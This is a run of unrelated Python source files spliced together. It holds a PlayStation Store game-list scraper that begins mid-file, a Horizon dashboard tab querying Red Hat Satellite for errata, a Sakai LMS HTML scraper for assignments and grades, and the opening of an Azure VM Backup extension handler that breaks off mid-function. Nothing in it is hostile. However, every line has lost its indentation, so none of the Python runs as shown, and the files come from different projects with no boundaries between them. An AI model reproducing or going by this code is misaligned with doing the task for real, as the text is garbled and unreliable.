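# Usage sketch (not part of the original script): fetch one page of the store
# listing and parse it. The URL below is abbreviated and hypothetical; the real
# URL template is built in process().
def _example_check_url():
    status_code, json_data = check_url(
        "https://store.playstation.com/valkyrie-api/en/SG/19/container/"
        "STORE-MSF86012-GAMESALL?size=10&start=0")
    if status_code == HTTPStatus.OK:
        records, raw_count = parse_data(json_data)
        return records
    return []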
def parse_data(json_data):
'''
@param json_data : JSON data.
@return Records, a list of lists.
@return Count of raw records.
'''
records = []
game_list = json_data["included"]
for game_info in game_list:
if game_info["type"] == "game":
game_details = game_info["attributes"]
if "skus" not in game_details:
continue
game_skus = game_details["skus"]
if len(game_skus) == 0:
continue
if "name" in game_skus[0]:
game_subname = game_skus[0]["name"].encode('ascii', errors = 'ignore').decode()
else:
game_subname = ""
game_prices = game_skus[0]["prices"]
game_prices_plus = game_prices["plus-user"]
game_name = game_details["name"].encode('ascii', errors = 'ignore').decode()
game_name_normalized = game_name.replace(" -", ":").strip() + " "
platforms = "/".join(game_details["platforms"]).encode('ascii', errors = 'ignore').decode()
genres = "/".join(game_details["genres"]).encode('ascii', errors = 'ignore').decode()
record = [ game_name, game_subname, game_details["provider-name"], genres, platforms, game_details["release-date"],
game_prices_plus["actual-price"]["display"], game_prices_plus["actual-price"]["value"], game_prices_plus["discount-percentage"],
game_prices_plus["availability"]["start-date"] if game_prices_plus["discount-percentage"] > 0 else "",
game_prices_plus["availability"]["end-date"] if game_prices_plus["discount-percentage"] > 0 else "",
game_details["game-content-type"], game_info["id"], game_details["thumbnail-url-base"], game_name_normalized]
records.append(record)
return records, len(game_list)
def process():
print("-" * 100)
time_str = strftime("%Y-%m-%d %H:%M:%S", localtime(time()))
print("Start time =", time_str)
url = "https://store.playstation.com/valkyrie-api/en/SG/19/container/STORE-MSF86012-GAMESALL?game_content_type=games%2Cbundles&sort=name&direction=asc"
if __data_type == 1:
url = url + "&platform=ps4"
url = url + "&size={0}&start={1}"
headers = ["Name", "SubName", "Provider", "Genres", "Platforms", "ReleaseDate",
"DisplayPrice", "PriceValue", "DiscountPercent", "DiscountFromDate", "DiscountToDate",
"GameContentType", "SkuId", "GamePost", "NormalizedName"]
records = []
start_position = 0
while True:
temp_url = url.format(__PAGE_SIZE, start_position)
status_code, json_data = check_url(temp_url)
if status_code != HTTPStatus.OK:
raise Exception("Retrieve data failed at position {0}.".format(start_position))
temp_records, raw_count = parse_data(json_data)
records.extend(temp_records)
print("Position {0}: Retrieved records = {1}".format(start_position, len(temp_records)))
if raw_count < __PAGE_SIZE:
break
start_position += __PAGE_SIZE
print("Total records =", len(records))
print("-" * 100)
# If given __output_file_path, output to file; otherwise, output to
# screen.
if __output_file_path:
if len(records) == 0:
raise Exception("No data retrieved.")
try:
# Open output file.
with open(__output_file_path, "wt", encoding = "utf-8") as output_file:
print('output_file =', output_file)
# Output file as CSV format.
cout = csv.writer(output_file, lineterminator = "\n")
# Write header line.
cout.writerow(headers)
# Write record lines.
cout.writerows(records)
print("Output process results: ok")
except Exception as e:
print("Output process results: Exception = {0}".format(e))
else:
# Output screen as JSON format.
print("headers =", headers)
print("records =")
for record in records:
print(record)
time_str = strftime("%Y-%m-%d %H:%M:%S", localtime(time()))
print("Stop time =", time_str)
def usage():
print('''
Retrieve game list.
Usage:
-h
-d <DataType> [-o <file path>]
Options:
-h : Show help.
-d <DataType> : Data type. Compulsory, Value [0: All, 1: PS4 only].
-o <file path> : Result output file path (CSV). Optional, output to screen by default.
''')
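# Example invocations (illustrative; the script filename is hypothetical):
#   python retrieve_game_list.py -d 0 -o all_games.csv   # all games to CSV
#   python retrieve_game_list.py -d 1                    # PS4 games to screen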
def main(argv):
'''
Pass input arguments from command line to method.
@param argv: A list of arguments
'''
global __data_type
global __output_file_path
print("argv =", argv)
__show_usage = False
__exit_code = 0
__error_message = None
# If no option was given at all.
if not argv:
__show_usage = True
# Parse command line.
if not __show_usage:
try:
opts, args = getopt.getopt(argv, "hd:o:")
print("opts =", opts)
print("args =", args)
except Exception as e:
# There would be getopt.GetoptError.
print("Parse command line: Exception = {0}".format(e))
__show_usage, __exit_code, __error_message = True, -1, "Wrong command line option."
# Check and parse each option.
if not __show_usage:
try:
for opt, arg in opts:
if opt == "-h":
__show_usage, __exit_code = True, 0
elif opt == "-d":
__data_type = int(arg)
elif opt == "-o":
__output_file_path = arg
else:
__show_usage, __exit_code, __error_message = True, -2, "Unknown command line option."
except Exception as e:
print("Parse command options: Exception = {0}".format(e))
__show_usage, __exit_code, __error_message = True, -3, "Wrong value for command line option."
print("show_usage =", __show_usage)
print("data_type =", __data_type)
print("output_file_path", __output_file_path)
# Check options are valid.
if not __show_usage:
if (__data_type is None):
__show_usage, __exit_code, __error_message = True, -4, "Missing compulsory command line option."
elif (__data_type < 0) or (__data_type > 1):
__show_usage, __exit_code, __error_message = True, -5, "Wrong value for -d."
if not __show_usage:
process()
else:
print("__exit_code =", __exit_code)
if __error_message:
print("__error_message =", __error_message)
print("")
usage()
sys.exit(__exit_code)
if __name__ == '__main__':
main(sys.argv[1:])
# -*- coding: utf8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import logging
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
import horizon.messages
from horizon import tabs
import requests
import requests_oauthlib
from tuskar_ui import api
from tuskar_ui.infrastructure.nodes import tabs as nodes_tabs
from tuskar_sat_ui.nodes import tables
SAT_HOST_PARAM = 'satellite_host'
SAT_API_PARAM = 'satellite_api'
SAT_AUTH_PARAM = 'satellite_auth'
SAT_ORG_PARAM = 'satellite_org'
SAT_CONFIG = 'SATELLITE_CONFIG'
VERIFY_SSL = not getattr(settings, 'OPENSTACK_SSL_NO_VERIFY', False)
LOG = logging.getLogger('tuskar_sat_ui')
ErrataItem = collections.namedtuple('ErrataItem', [
'title',
'type',
'id',
'host_id',
'issued',
'admin_url',
])
class Error(Exception):
pass
class NoConfigError(Error):
"""Failed to find the Satellite configuration in Heat parameters."""
def __init__(self, param=None, *args, **kwargs):
super(NoConfigError, self).__init__(*args, **kwargs)
self.param = param
class NodeNotFound(Error):
"""Failed to find the Satellite node."""
class BadAuthError(Error):
"""Unknown authentication method for Satellite."""
def __init__(self, auth=None, *args, **kwargs):
super(BadAuthError, self).__init__(*args, **kwargs)
self.auth = auth
class NoErrataError(Error):
"""There is no errata for that node."""
def _get_satellite_config():
"""Find the Satellite configuration data.
The configuration data is stored in Heat as parameters. They may be
stored directly as Heat parameters, or in the JSON structure stored
in ExtraConfig.
"""
try:
config = getattr(settings, SAT_CONFIG)
except AttributeError:
raise NoConfigError(SAT_CONFIG, 'Parameter %r missing.' % SAT_CONFIG)
for param in [SAT_HOST_PARAM, SAT_AUTH_PARAM, SAT_ORG_PARAM]:
if param not in config:
raise NoConfigError(param, 'Parameter %r missing.' % param)
admin_url = config[SAT_HOST_PARAM]
# Get rid of any trailing slash in the admin url
admin_url = admin_url.strip('/')
try:
auth = config[SAT_AUTH_PARAM].split(':', 2)
except ValueError:
raise BadAuthError(auth=config[SAT_AUTH_PARAM])
if auth[0] == 'oauth':
auth = requests_oauthlib.OAuth1(auth[1], auth[2])
elif auth[0] == 'basic':
auth = auth[1], auth[2]
else:
raise BadAuthError(auth=auth[0])
organization = config[SAT_ORG_PARAM]
if SAT_API_PARAM in config:
api_url = config[SAT_API_PARAM]
# Get rid of any trailing slash in the API url
api_url = api_url.strip('/')
else:
api_url = admin_url
return admin_url, api_url, auth, organization
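# Illustrative sketch (not part of the original module): the shape of the
# SATELLITE_CONFIG setting that _get_satellite_config expects. All values
# below are placeholders; the auth string is "basic:<user>:<password>" or
# "oauth:<key>:<secret>", and the API URL entry is optional.
EXAMPLE_SATELLITE_CONFIG = {
    SAT_HOST_PARAM: 'https://satellite.example.com',
    SAT_API_PARAM: 'https://satellite.example.com',
    SAT_AUTH_PARAM: 'basic:admin:secret',
    SAT_ORG_PARAM: '1',
}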
def _get_stack(request):
"""Find the stack."""
# TODO(rdopiera) We probably should use the StackMixin instead.
try:
plan = api.tuskar.Plan.get_the_plan(request)
stack = api.heat.Stack.get_by_plan(request, plan)
except Exception as e:
LOG.exception(e)
horizon.messages.error(request, _("Could not retrieve errata."))
return None
return stack
def _find_uuid_by_mac(api_url, auth, organization, addresses):
"""Pick up the UUID from the MAC address.
This makes no sense, as we need both MAC address and the interface, and
we don't have the interface, so we need to make multiple slow searches.
If the Satellite UUID isn't the same as this one, and it probably
isn't, we need to store a mapping somewhere.
"""
url = '{api_url}/katello/api/v2/systems'.format(api_url=api_url)
for mac in addresses:
for interface in ['eth0', 'eth1', 'en0', 'en1']:
q = 'facts.net.interface.{iface}.mac_address:"{mac}"'.format(
iface=interface, mac=mac.upper())
params = {'search': q, 'organization_id': organization}
r = requests.get(url, params=params, auth=auth,
verify=VERIFY_SSL)
r.raise_for_status() # Raise an error if the request failed
contexts = r.json()['results']
if contexts:
return contexts[0]['uuid']
raise NodeNotFound()
def _get_errata_data(admin_url, api_url, auth, uuid):
"""Get the errata here, while it's hot."""
url = '{url}/katello/api/v2/systems/{id}/errata'.format(url=api_url,
id=uuid)
r = requests.get(url, auth=auth, verify=VERIFY_SSL)
r.raise_for_status() # Raise an error if the request failed
errata = r.json()['results']
if not errata:
raise NoErrataError()
data = [ErrataItem(x['title'], x['type'], x['errata_id'], uuid,
x['issued'], admin_url) for x in errata]
return data
class DetailOverviewTab(nodes_tabs.DetailOverviewTab):
template_name = 'infrastructure/nodes/_detail_overview_sat.html'
def get_context_data(self, request, **kwargs):
context = super(DetailOverviewTab,
self).get_context_data(request, **kwargs)
if context['node'].uuid is None:
return context
try:
admin_url, api_url, auth, organization = _get_satellite_config()
except NoConfigError as e:
horizon.messages.error(request, _(
"No Satellite configuration found. "
"Missing parameter %r."
) % e.param)
return context
except BadAuthError as e:
horizon.messages.error(request, _(
"Satellite configuration error, "
"unknown authentication method %r."
) % e.auth)
return context
addresses = context['node'].addresses
try:
uuid = _find_uuid_by_mac(api_url, auth, organization, addresses)
except NodeNotFound:
return context
# TODO(rdopiera) Should probably catch that requests exception here.
try:
data = _get_errata_data(admin_url, api_url, auth, uuid)
except NoErrataError:
return context
context['errata'] = tables.ErrataTable(request, data=data)
return context
class NodeDetailTabs(tabs.TabGroup):
slug = "node_details"
tabs = (DetailOverviewTab,)
from copy import deepcopy
import HTMLParser
import re
try:
from BeautifulSoup import BeautifulSoup as soup
BS_AVAILABLE = True
except ImportError:
print "WARNING - BS4 NOT AVAILABLE"
BS_AVAILABLE = False
class HTMLScraperInterface(object):
def get_iframes(self, html_in):
raise NotImplementedError('Subclasses of HTMLScraperInterface should override this method')
def get_tools(self, html_in):
raise NotImplementedError('Subclasses of HTMLScraperInterface should override this method')
def get_assignments(self, html_in):
raise NotImplementedError('Subclasses of HTMLScraperInterface should override this method')
def get_grades(self, html_in):
raise NotImplementedError('Subclasses of HTMLScraperInterface should override this method')
class LXMLParser(HTMLScraperInterface):
def get_iframes(self, html_in):
doc = soup(html_in)
frame_attrs = dict(doc.iframe.attrs)
return [{'name' : frame_attrs['name'],
'title': frame_attrs['title'],
'src' : frame_attrs['src'] }]
def get_tools(self, html_in):
doc = soup(html_in)
out_dict_list = []
for tab in doc.findAll('a'):
class_type = tab.get('class')
if class_type and re.match('icon-sakai-*', class_type):
out_dict_list.append({'name': tab.get('class')[11:].strip(),
'href': tab.get('href'),
'desc': tab.get('title')})
return out_dict_list
def get_assignments(self, html_in):
doc = soup(html_in)
out_list = []
table = doc.table
for i, table_row in enumerate(table('tr')):
if i == 0:
# skip the table header row
pass
else:
temp_obj = { 'href' : table_row.a['href'] }
for table_col in table_row('td'):
header = table_col.get('headers')
if header is not None:
temp_obj[header] = table_col.text.strip()
out_list.append(temp_obj)
return out_list
def get_grades(self, html_in):
doc = soup(html_in)
out_dict = {}
tables = doc.findAll('table')
# tables[0] is the header that we don't care about
# tables[1] is the course grade
course_grade_table = tables[1]
if tables[1].span:
out_dict['course_grade'] = { 'letter_grade': tables[1].span.text,
'number_grade': tables[1]('span')[1].text }
else:
out_dict['course_grade'] = { 'error' : 'Not yet available'}
out_dict['grades'] = {}
# tables[2] is a bunch of javascript and all of the grade data.
# first we have to strip away the javascript.
row_data = [x for x in tables[2]('td')]
_NEXT_FIELD = 'name'
_CURRENT_CATEGORY = ''
_temp = {}
for row in row_data:
if row.img:
# this is the first row of the table
continue
if row.span:
# this is a category
_CURRENT_CATEGORY = row.span.text.strip()
if not _CURRENT_CATEGORY in out_dict['grades']:
out_dict['grades'][_CURRENT_CATEGORY] = []
elif row.get('class') == 'left' and _NEXT_FIELD == 'name':
# this is a grade name
_temp['name'] = row.text
_NEXT_FIELD = 'date'
elif _NEXT_FIELD == 'date':
_temp['date'] = row.text
_NEXT_FIELD = 'grade'
elif _NEXT_FIELD == 'grade':
_temp['grade'] = row.text
_NEXT_FIELD = 'comments'
elif _NEXT_FIELD == 'comments':
_temp['comments'] = row.text
_NEXT_FIELD = 'attachment'
elif _NEXT_FIELD == 'attachment':
# ignore this for now
_NEXT_FIELD = 'name'
if _CURRENT_CATEGORY == '':
if not 'unnamed' in out_dict['grades']:
out_dict['grades']['unnamed'] = []
out_dict['grades']['unnamed'].append(_temp)
_temp = {}
else:
out_dict['grades'][_CURRENT_CATEGORY].append(_temp)
_temp = {}
return out_dict
def get_syllabus(self, html_in):
soup_html = soup(html_in)
table = soup_html('table')
html = table.__repr__()[1:-1] # SERIOUSLY beautifulsoup????
return html
class DefaultParser(HTMLScraperInterface):
def get_iframes(self, html_in):
return _IFrameParser().get_iframes(html_in)
def get_tools(self, html_in):
return _SiteToolHTMLParser().get_tools(html_in)
def get_assignments(self, html_in):
return _AssignmentHTMLParser().get_assignments(html_in)
class _IFrameParser(HTMLParser.HTMLParser):
def __init__(self):
HTMLParser.HTMLParser.__init__(self)
self._iframes = []
def handle_starttag(self, tag, attrs):
first_attr = dict(attrs)
if tag == 'iframe':
self._iframes.append({ 'name' : first_attr['name'],
'title': first_attr['title'].strip(),
'src' : first_attr['src']})
def get_iframes(self, html_input):
self.feed(html_input)
return self._iframes
class _SiteToolHTMLParser(HTMLParser.HTMLParser):
def __init__(self):
HTMLParser.HTMLParser.__init__(self)
self._tools = []
def handle_starttag(self, tag, attrs):
first_attr = dict(attrs)
# if this is a link with a class attribute
if tag == 'a' and 'class' in first_attr:
# look for tools
if first_attr['class'].strip() == 'icon-sakai-syllabus':
self._tools.append({ 'name': 'syllabus',
'href': first_attr['href'],
'desc': first_attr['title']})
elif first_attr['class'].strip() == 'icon-sakai-resources':
self._tools.append({ 'name': 'resources',
'href': first_attr['href'],
'desc': first_attr['title']})
elif first_attr['class'].strip() == 'icon-sakai-assignment-grades':
self._tools.append({ 'name': 'assignments',
'href': first_attr['href'],
'desc': first_attr['title']})
elif first_attr['class'].strip() == 'icon-sakai-gradebook-tool':
self._tools.append({ 'name': 'grades',
'href': first_attr['href'],
'desc': first_attr['title']})
def get_tools(self, html_text):
self.feed(html_text)
return self._tools
def purge(self):
self._tools = []
class _AssignmentHTMLParser(HTMLParser.HTMLParser):
_PARSER_STATE = ['WAITING_FOR_H4',
'WAITING_FOR_LINK',
'WAITING_FOR_TITLE',
'WAITING_FOR_STATUS',
'WAITING_FOR_OPEN_DATE',
'WAITING_FOR_DUE_DATE']
_LEXER_STATE = ['STARTING_STATE',
'NEXT_IS_TITLE',
'NEXT_IS_STATUS',
'NEXT_IS_OPEN_DATE',
'NEXT_IS_DUE_DATE']
def __init__(self):
HTMLParser.HTMLParser.__init__(self)
self._assignments = []
self._state = 'WAITING_FOR_H4'
self._lstate = 'STARTING_STATE'
self._constructed_obj = {}
def _assert_state(self, desired_state, desired_lstate):
return self._state == desired_state and self._lstate == desired_lstate
def handle_starttag(self, tag, attr):
first_attr = dict(attr)
if tag == 'h4':
# this is an assignment name
if self._assert_state('WAITING_FOR_H4', 'STARTING_STATE'):
self._state = 'WAITING_FOR_LINK'
elif tag == 'a':
# this is a link
if self._assert_state('WAITING_FOR_LINK', 'STARTING_STATE'):
self._constructed_obj['href'] = first_attr['href']
self._state = 'WAITING_FOR_TITLE'
self._lstate = 'NEXT_IS_TITLE'
elif tag == 'td':
# this is a table
if 'headers' in first_attr:
if first_attr['headers'] == 'status':
self._lstate = 'NEXT_IS_STATUS'
elif first_attr['headers'] == 'openDate':
self._lstate = 'NEXT_IS_OPEN_DATE'
elif first_attr['headers'] == 'dueDate':
self._lstate = 'NEXT_IS_DUE_DATE'
def handle_data(self, data):
stripped_data = data.strip('\t\n')
if len(stripped_data) == 0:
return
if self._assert_state('WAITING_FOR_TITLE', 'NEXT_IS_TITLE'):
self._constructed_obj['title'] = stripped_data
self._state = 'WAITING_FOR_STATUS'
self._lstate = 'STARTING_STATE'
elif self._assert_state('WAITING_FOR_STATUS', 'NEXT_IS_STATUS'):
self._constructed_obj['status'] = stripped_data
self._state = 'WAITING_FOR_OPEN_DATE'
self._lstate = 'STARTING_STATE'
elif self._assert_state('WAITING_FOR_OPEN_DATE', 'NEXT_IS_OPEN_DATE'):
self._constructed_obj['openDate'] = stripped_data
self._state = 'WAITING_FOR_DUE_DATE'
self._lstate = 'STARTING_STATE'
elif self._assert_state('WAITING_FOR_DUE_DATE', 'NEXT_IS_DUE_DATE'):
self._constructed_obj['dueDate'] = stripped_data
self._assignments.append(deepcopy(self._constructed_obj))
self._constructed_obj = {}
self._state = self._PARSER_STATE[0]
self._lstate = self._LEXER_STATE[0]
def get_assignments(self, html_input):
self.feed(html_input)
return self._assignments
def purge(self):
self._assignments = []
self._constructed_obj = {}
self._state = self._PARSER_STATE[0]
REGISTERED_METHODS = { 'default' : DefaultParser,
'bs4' : LXMLParser }
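# Usage sketch (not part of the original module): pick a parser implementation
# from the registry and extract tool links from a page. `html` is whatever
# portal markup the caller has already fetched.
def _example_get_tools(html, method='default'):
    parser = REGISTERED_METHODS[method]()
    return parser.get_tools(html)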
#!/usr/bin/env python
#
# VM Backup extension
#
# Copyright 2014 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import array
import base64
import os
import os.path
import re
import json
import string
import subprocess
import sys
import time
import shlex
import traceback
import datetime
import random
try:
import ConfigParser as ConfigParsers
except ImportError:
import configparser as ConfigParsers
from threading import Thread
from time import sleep
from os.path import join
from mounts import Mounts
from mounts import Mount
from patch import *
from fsfreezer import FsFreezer
from common import CommonVariables
from parameterparser import ParameterParser
from Utils import HandlerUtil
from Utils import SizeCalculation
from Utils import Status
from freezesnapshotter import FreezeSnapshotter
from backuplogger import Backuplogger
from blobwriter import BlobWriter
from taskidentity import TaskIdentity
from MachineIdentity import MachineIdentity
import ExtensionErrorCodeHelper
from PluginHost import PluginHost
from PluginHost import PluginHostResult
import platform
from workloadPatch import WorkloadPatch
# Main function is the only entrance to this extension handler
def main():
global MyPatching,backup_logger,hutil,run_result,run_status,error_msg,freezer,freeze_result,snapshot_info_array,total_used_size,size_calculation_failed, patch_class_name, orig_distro, configSeqNo
try:
run_result = CommonVariables.success
run_status = 'success'
error_msg = ''
freeze_result = None
snapshot_info_array = None
total_used_size = 0
size_calculation_failed = False
HandlerUtil.waagent.LoggerInit('/dev/console','/dev/stdout')
hutil = HandlerUtil.HandlerUtility(HandlerUtil.waagent.Log, HandlerUtil.waagent.Error, CommonVariables.extension_name)
backup_logger = Backuplogger(hutil)
MyPatching, patch_class_name, orig_distro = GetMyPatching(backup_logger)
hutil.patching = MyPatching
configSeqNo = -1
for a in sys.argv[1:]:
if re.match("^([-/]*)(disable)", a):
disable()
elif re.match("^([-/]*)(uninstall)", a):
uninstall()
elif re.match("^([-/]*)(install)", a):
install()
elif re.match("^([-/]*)(enable)", a):
enable()
elif re.match("^([-/]*)(update)", a):
update()
elif re.match("^([-/]*)(daemon)", a):
daemon()
elif re.match("^([-/]*)(seqNo:)", a):
try:
configSeqNo = int(a.split(':')[1])
except:
configSeqNo = -1
except Exception as e:
sys.exit(0)
def install():
global hutil,configSeqNo
hutil.do_parse_context('Install', configSeqNo)
hutil.do_exit(0, 'Install','success','0', 'Install Succeeded')
def status_report_to_file(file_report_msg):
global backup_logger,hutil
hutil.write_to_status_file(file_report_msg)
backup_logger.log("file status report message:",True)
backup_logger.log(file_report_msg,True)
def status_report_to_blob(blob_report_msg):
global backup_logger,hutil,para_parser
UploadStatusAndLog = hutil.get_strvalue_from_configfile('UploadStatusAndLog','True')
if(UploadStatusAndLog == None or UploadStatusAndLog == 'True'):
try:
if(para_parser is not None and para_parser.statusBlobUri is not None and para_parser.statusBlobUri != ""):
blobWriter = BlobWriter(hutil)
if(blob_report_msg is not None):
blobWriter.WriteBlob(blob_report_msg,para_parser.statusBlobUri)
backup_logger.log("blob status report message:",True)
backup_logger.log(blob_report_msg,True)
else:
backup_logger.log("blob_report_msg is none",True)
except Exception as e:
err_msg='cannot write status to the status blob'+traceback.format_exc()
backup_logger.log(err_msg, True, 'Warning')
def get_status_to_report(status, status_code, message, snapshot_info = None):
global MyPatching,backup_logger,hutil,para_parser,total_used_size,size_calculation_failed
blob_report_msg = None
file_report_msg = None
try:
if total_used_size == -1 :
sizeCalculation = SizeCalculation.SizeCalculation(patching = MyPatching , logger = backup_logger , para_parser = para_parser)
total_used_size,size_calculation_failed = sizeCalculation.get_total_used_size()
number_of_blobs = len(para_parser.includeLunList)
maximum_possible_size = number_of_blobs * 1099511627776
if(total_used_size>maximum_possible_size):
total_used_size = maximum_possible_size
backup_logger.log("Assertion Check, total size : {0} ,maximum_possible_size : {1}".format(total_used_size,maximum_possible_size),True)
if(para_parser is not None):
blob_report_msg, file_report_msg = hutil.do_status_report(operation='Enable',status=status,\
status_code=str(status_code),\
message=message,\
taskId=para_parser.taskId,\
commandStartTimeUTCTicks=para_parser.commandStartTimeUTCTicks,\
snapshot_info=snapshot_info,\
total_size = total_used_size,\
failure_flag = size_calculation_failed)
except Exception as e:
err_msg='cannot get status report parameters , Exception %s, stack trace: %s' % (str(e), traceback.format_exc())
backup_logger.log(err_msg, True, 'Warning')
return blob_report_msg, file_report_msg
def exit_with_commit_log(status,result,error_msg, para_parser):
global backup_logger
backup_logger.log(error_msg, True, 'Error')
if(para_parser is not None and para_parser.logsBlobUri is not None and para_parser.logsBlobUri != ""):
backup_logger.commit(para_parser.logsBlobUri)
blob_report_msg, file_report_msg = get_status_to_report(status, result, error_msg, None)
status_report_to_file(file_report_msg)
status_report_to_blob(blob_report_msg)
sys.exit(0)
def exit_if_same_taskId(taskId):
global backup_logger,hutil,para_parser
trans_report_msg = None
taskIdentity = TaskIdentity()
last_taskId = taskIdentity.stored_identity()
if(taskId == last_taskId):
backup_logger.log("TaskId is same as last, so skip with Processed Status, current:" + str(taskId) + "== last:" + str(last_taskId), True)
status=CommonVariables.status_success
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.SuccessAlreadyProcessedInput)
status_code=CommonVariables.SuccessAlreadyProcessedInput
message='TaskId AlreadyProcessed nothing to do'
backup_logger.log(message, True)
sys.exit(0)
def freeze_snapshot(timeout):
try:
global hutil,backup_logger,run_result,run_status,error_msg,freezer,freeze_result,para_parser,snapshot_info_array,g_fsfreeze_on, workload_patch
canTakeCrashConsistentSnapshot = can_take_crash_consistent_snapshot(para_parser)
freeze_snap_shotter = FreezeSnapshotter(backup_logger, hutil, freezer, g_fsfreeze_on, para_parser, canTakeCrashConsistentSnapshot)
backup_logger.log("Calling do snapshot method", True, 'Info')
run_result, run_status, snapshot_info_array = freeze_snap_shotter.doFreezeSnapshot()
if (canTakeCrashConsistentSnapshot == True and run_result != CommonVariables.success and run_result != CommonVariables.success_appconsistent):
if (snapshot_info_array is not None and snapshot_info_array !=[] and check_snapshot_array_fail() == False and len(snapshot_info_array) == 1):
run_status = CommonVariables.status_success
run_result = CommonVariables.success
hutil.SetSnapshotConsistencyType(Status.SnapshotConsistencyType.crashConsistent)
except Exception as e:
errMsg = 'Failed to do the snapshot with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
backup_logger.log(errMsg, True, 'Error')
run_result = CommonVariables.error
run_status = 'error'
error_msg = 'Enable failed with exception in safe freeze or snapshot '
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error)
#snapshot_done = True
def check_snapshot_array_fail():
global snapshot_info_array, backup_logger
snapshot_array_fail = False
if snapshot_info_array is not None and snapshot_info_array !=[]:
for snapshot_index in range(len(snapshot_info_array)):
if(snapshot_info_array[snapshot_index].isSuccessful == False):
backup_logger.log('T:S snapshot failed at index ' + str(snapshot_index), True)
snapshot_array_fail = True
break
return snapshot_array_fail
def get_key_value(jsonObj, key):
value = None
if(key in jsonObj.keys()):
value = jsonObj[key]
return value
def can_take_crash_consistent_snapshot(para_parser):
global backup_logger
takeCrashConsistentSnapshot = False
if(para_parser != None and para_parser.customSettings != None and para_parser.customSettings != ''):
customSettings = json.loads(para_parser.customSettings)
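        # Illustrative (assumed) shape of the customSettings JSON parsed above; only
        # the three keys read by this function are shown, values are examples:
        #   {"isManagedVm": true, "canTakeCrashConsistentSnapshot": true, "backupRetryCount": 2}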
isManagedVm = get_key_value(customSettings, 'isManagedVm')
canTakeCrashConsistentSnapshot = get_key_value(customSettings, 'canTakeCrashConsistentSnapshot')
backupRetryCount = get_key_value(customSettings, 'backupRetryCount')
numberOfDisks = 0
if (para_parser.includeLunList is not None):
numberOfDisks = len(para_parser.includeLunList)
isAnyNone = (isManagedVm is None or canTakeCrashConsistentSnapshot is None or backupRetryCount is None)
if (isAnyNone == False and isManagedVm == True and canTakeCrashConsistentSnapshot == True and backupRetryCount > 0 and numberOfDisks == 1):
takeCrashConsistentSnapshot = True
backup_logger.log("isManagedVm=" + str(isManagedVm) + ", canTakeCrashConsistentSnapshot=" + str(canTakeCrashConsistentSnapshot) + ", backupRetryCount=" + str(backupRetryCount) + ", numberOfDisks=" + str(numberOfDisks) + ", takeCrashConsistentSnapshot=" + str(takeCrashConsistentSnapshot), True, 'Info')
return takeCrashConsistentSnapshot
def daemon():
global MyPatching,backup_logger,hutil,run_result,run_status,error_msg,freezer,para_parser,snapshot_done,snapshot_info_array,g_fsfreeze_on,total_used_size,patch_class_name,orig_distro, workload_patch, configSeqNo
#this is using the most recent file timestamp.
hutil.do_parse_context('Executing', configSeqNo)
try:
backup_logger.log('starting daemon', True)
backup_logger.log("patch_class_name: "+str(patch_class_name)+" and orig_distro: "+str(orig_distro),True)
# handle the restoring scenario.
mi = MachineIdentity()
stored_identity = mi.stored_identity()
if(stored_identity is None):
mi.save_identity()
else:
current_identity = mi.current_identity()
if(current_identity != stored_identity):
current_seq_no = -1
backup_logger.log("machine identity not same, set current_seq_no to " + str(current_seq_no) + " " + str(stored_identity) + " " + str(current_identity), True)
hutil.set_last_seq(current_seq_no)
mi.save_identity()
except Exception as e:
errMsg = 'Failed to validate sequence number with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
backup_logger.log(errMsg, True, 'Error')
freezer = FsFreezer(patching= MyPatching, logger = backup_logger, hutil = hutil)
global_error_result = None
# precheck
freeze_called = False
configfile='/etc/azure/vmbackup.conf'
thread_timeout=str(60)
OnAppFailureDoFsFreeze = True
OnAppSuccessDoFsFreeze = True
#Adding python version to the telemetry
try:
python_version_info = sys.version_info
python_version = str(sys.version_info[0])+ '.' + str(sys.version_info[1]) + '.' + str(sys.version_info[2])
HandlerUtil.HandlerUtility.add_to_telemetery_data("pythonVersion", python_version)
except Exception as e:
        errMsg = 'Failed to retrieve python version with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
backup_logger.log(errMsg, True, 'Error')
#fetching platform architecture
try:
architecture = platform.architecture()[0]
HandlerUtil.HandlerUtility.add_to_telemetery_data("platformArchitecture", architecture)
except Exception as e:
errMsg = 'Failed to do retrieve "platform architecture" with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
backup_logger.log(errMsg, True, 'Error')
try:
if(freezer.mounts is not None):
hutil.partitioncount = len(freezer.mounts.mounts)
backup_logger.log(" configfile " + str(configfile), True)
config = ConfigParsers.ConfigParser()
config.read(configfile)
if config.has_option('SnapshotThread','timeout'):
thread_timeout= config.get('SnapshotThread','timeout')
if config.has_option('SnapshotThread','OnAppFailureDoFsFreeze'):
OnAppFailureDoFsFreeze= config.get('SnapshotThread','OnAppFailureDoFsFreeze')
if config.has_option('SnapshotThread','OnAppSuccessDoFsFreeze'):
OnAppSuccessDoFsFreeze= config.get('SnapshotThread','OnAppSuccessDoFsFreeze')
except Exception as e:
errMsg='cannot read config file or file not present'
backup_logger.log(errMsg, True, 'Warning')
backup_logger.log("final thread timeout" + thread_timeout, True)
snapshot_info_array = None
try:
# we need to freeze the file system first
backup_logger.log('starting daemon', True)
"""
protectedSettings is the privateConfig passed from Powershell.
WATCHOUT that, the _context_config are using the most freshest timestamp.
if the time sync is alive, this should be right.
"""
protected_settings = hutil._context._config['runtimeSettings'][0]['handlerSettings'].get('protectedSettings', {})
public_settings = hutil._context._config['runtimeSettings'][0]['handlerSettings'].get('publicSettings')
para_parser = ParameterParser(protected_settings, public_settings, backup_logger)
